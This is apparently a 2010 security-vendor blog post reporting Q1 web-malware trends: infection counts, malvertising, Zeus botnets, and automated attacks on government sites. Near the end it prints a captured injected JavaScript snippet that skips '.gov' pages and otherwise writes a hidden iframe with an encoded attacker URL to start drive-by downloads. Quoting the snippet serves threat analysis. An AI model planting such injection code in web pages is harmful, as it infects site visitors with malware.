Dasient Blog: Q1'10 web-based malware data and trends

Monday, May 10, 2010

Q1'10 web-based malware data and trends

Each quarter we pull together data for web-based malware attacks from across the web. Our proprietary malware analysis platform allows us to monitor millions of websites and draw results from a wealth of data which we summarize in this blog. What we continue to see is that the web malware threat continues to grow significantly. Hackers are becoming increasingly sophisticated and bold in their attacks, which means that legitimate websites are more threatened than ever. Putting web site security best practices in place such as malware monitoring and containment is becoming an absolute must if businesses do not want to expose themselves and their customers to these attacks. A particularly interesting observation has been an increase in 'malvertising' attacks in which hackers plant malicious ads on high-profile ad networks and websites. We'll dig deeper into that but first, let's take a look at some of our results:

The Q1 2010 Data

In Q1 2010, we estimate that over 720,000 web sites were infected. While this number is significantly higher than our previous estimate of 560,000 infected web sites during Q4 2009, we also improved our methodology based on new telemetry from scanning a larger number of sites on the Internet and that accounts for infected sites that were previously not included.

This number does not only include small to medium sites getting infected, but also larger, high-profile websites (including Fortune 500 companies). Larger sites are desirable targets because of their high volume of traffic. It's much more convenient for an attacker to compromise an existing site than to try and build web traffic to a site they set up from scratch.

The challenge for websites is that there are many different ways for them to get infected. For example, a site that uses a javascript widget that is hosted externally could be at risk for getting compromised with web-based malware, as discussed in a Google report. Or publishers, blogs and other content providers that use third-party ad networks are at risk of having malvertisements introduced to their users on their site. Many sites (large and small) also rely on third-parties to provide packaged software that powers applications on their website. Examples include content management systems, blogging software, web server software, etc. It is often difficult for websites to constantly keep the software running their site up-to-date and patched to the latest version. Keeping server side web applications up-to-date is just as or even more challenging than keeping client side software up-to-date and patched. Even patched applications have vulnerabilities, which emphasizes the need for malware monitoring to mitigate risk due to both known and unknown vulnerabilities in web applications. In fact, in April there was a mass attack on Wordpress where attackers exploited a vulnerability to infect thousands of websites with malware.

As part of our quarterly malware update, we performed a study of a large pool of websites where we identified the risk factors on those sites that may contribute to malware infections. The results were surprising. We found that 97% of Fortune 500 web sites are at a high risk of getting infected with malware due to external partners (such as javascript widget providers, ad networks, and/or packaged software providers). In fact, Fortune 500 web sites have such a high risk because 69% of them use external Javascript to render portions of their sites and 64% of them are running outdated web applications. (We will be publishing a more in-depth study of malware-specific vulnerabilities on websites in the future.)

On a side note: We launched a new service in Q1 called the Dasient Malware Risk Assessment which allows us to run risk profiles on our customers, giving them information on where they are most exposed to web malware. We obtained the above-mentioned results by running our Malware Risk Assessment on a significant number of industry-specific web sites. If any of you are interested in running such an assessment on your web site, please fill in the form and we'll get you started.

Getting back to our statistics: reinfection rates decreased slightly from 42.4% to 40.5%; although, in general, the probability that a web site will get re-infected is still very high. And, of course, higher re-infection rates mean the site has a higher likelihood of suffering from loss of traffic, a decline in revenue, and damage to brand equity.

The average number of processes that infected web sites start on compromised machines is 3.03 (up from 2.8). Although a little higher than last quarter this is still indicative to us that attackers are getting smarter about the way they structure their attacks, opting for a smaller fingerprint on an infected machine, as historically attackers have started up to a dozen or more new processes on machines they compromise.
23.8% of new processes started due to drive-by-downloads had one character filenames such as “a.exe” or “f.exe”.

Attackers prefer to use “.com” domains to host malware. “.com” was the most popular followed by “.cn”. The domain “dnparking.com” was an attacker site used to infect a relatively large number of sites early in the quarter.

ASP, HTML, and PHP pages were the most infected in that order. The combined number of ASP and PHP pages infected shows an increase in dynamic content being infected this quarter which once again emphasizes the growing complexity in web sites and web applications.

Uptick in Anti-Malvertising attacks in Q1

One of the major trends observed is the spike in malvertising attacks since the beginning of 2010.
While content and feature-rich advertisements have been used on the web for some time, attackers are investing more in using them as a channel to distribute drive-by malware downloads.

Viruses and other malware were found to be lurking in ads on high-profile sites like The New York Times, Drudge Report.com, TechCrunch and WhitePages.com as well as by big ad delivery platforms such as Yahoo, Fox and Google.

We thought it may be useful to describe how malvertising attacks work, in general. In a typical attack, the hacker signs up to place an ad on a victim ad network (often using a stolen credit card), or compromises the credentials of an existing advertiser on an ad network. If the attacker signs up for a new account with an ad network, the attacker often places a legitimate-looking ad first, and switches it for a malicious ad once the attacker "gains trust" with the ad network. As some ad networks have stricter policies and/or vetting processes around the posting of ads for relatively new advertisers, some attackers simply compromise the login credentials of already existing, legitimate advertisers.

Given that so much of the web is monetized via advertising streams, it is a wonder that malvertising attacks aren't worse than they are, and the malvertising attacks over the past few weeks could be a harbinger of the growing threat to online advertising commerce.

Now that we have discussed high-level trends from the update, let's take a closer look at what the malware does once it is downloaded to a user's PC.

What is the Malware doing?

In many cases, the malware was trying to join a botnet. Botnets are networks of PCs, which have been taken over by malware programs. What the botnet will end up doing depends on what the botnet 'master' wants it to do but usually it will hook processes to capture keystrokes, send email spam etc. Some of the more common mechanisms to conduct drive-by-downloads included taking advantage of Adobe PDF exploits, and encouraging users to click on socially engineered fake AV windows to initiate dangerous downloads. In particular the 'Zeus' botnet has become very widely spread. Netwitness, based in Herndon, VA, released a report highlighting the kind of havoc the malware can wreak. It documents a Zeus botnet that controlled nearly 75,000 computer in more than 2,400 organizations, including some large and reputable ones such as Merck, Juniper Networks and the Hollywood Studio Paramount Pictures. Over four weeks, the botnet was used to steal more than 68,000 log-in credentials, including thousands of Facebook log-ins and Yahoo email log-ins.

Another interesting observation from our research is how attackers interact with government web sites.

Cybercriminals not interested in CyberWar (yet?)

Attackers use automated scripts to query search engines to get lists of vulnerable sites, and then have their scripts automatically infect sites. Their scripts are typically not very discriminating about which sites they attack. Government-run web sites, for instance, are also likely to be attacked by these automated scripts. For example, last month a part of the Environmental Protection Agency's (EPA) web site was infected, and in May the US Treasury had three of its web sites hacked.

It seems, though, that the attackers conducting such attacks are purely in it for the money. One might imagine that inadvertently attacking certain government web sites might provoke a serious (even military) reaction. Hence, while the attackers want to distribute their malware for fun and profit, they want to stay away from starting an all-out cyberwar. Why do we say that? In some of the attacks that we track, we have seen JavaScript code such as the following, which attackers inject:

if (document.location.href.indexOf("gov") >= 0) {
} else {
  document.write("<div style="'display:none'">");
  document.write(unescape('%3Ciframe%20src%3Dhttp%3A//%6B%6F%74%73%2E%39%39%36%36%2E%6F%72%67:%39%37/%78%6F/%64%6B.html%20width=100%20height=0%3E%3C/iframe%3E'));
  document.write("</div>");
}

Basically, the code above says that if the web site attacked is a government web site, then DO NOT serve a malware drive-by-download. Otherwise, it happily generates an invisible frame on the page that pulls in malicious content onto the page which initiates a drive-by-download. What is interesting here is that while an attacker's script may automatically inject the code above into any website, the code is careful not to serve malware to visitors, including government employees, as doing so could be interpreted as an act of cyber-war. What is also interesting that the attackers could decide to launch a cyber-war at any time.

Summary

Based on our research, it is evident that the malware epidemic is growing rapidly. With cybercrime techniques getting more sophisticated every day, it is critical to educate businesses on how they can put safe security practices in place for their websites to protect their customers and their revenues. In order to make sure that their businesses are not exposed, web sites can mitigate their risk by monitoring their websites for malware regularly.

If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your websites, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed for all the latest in web-based malware and general security news.

Keep your sites safe!
Your Dasient Team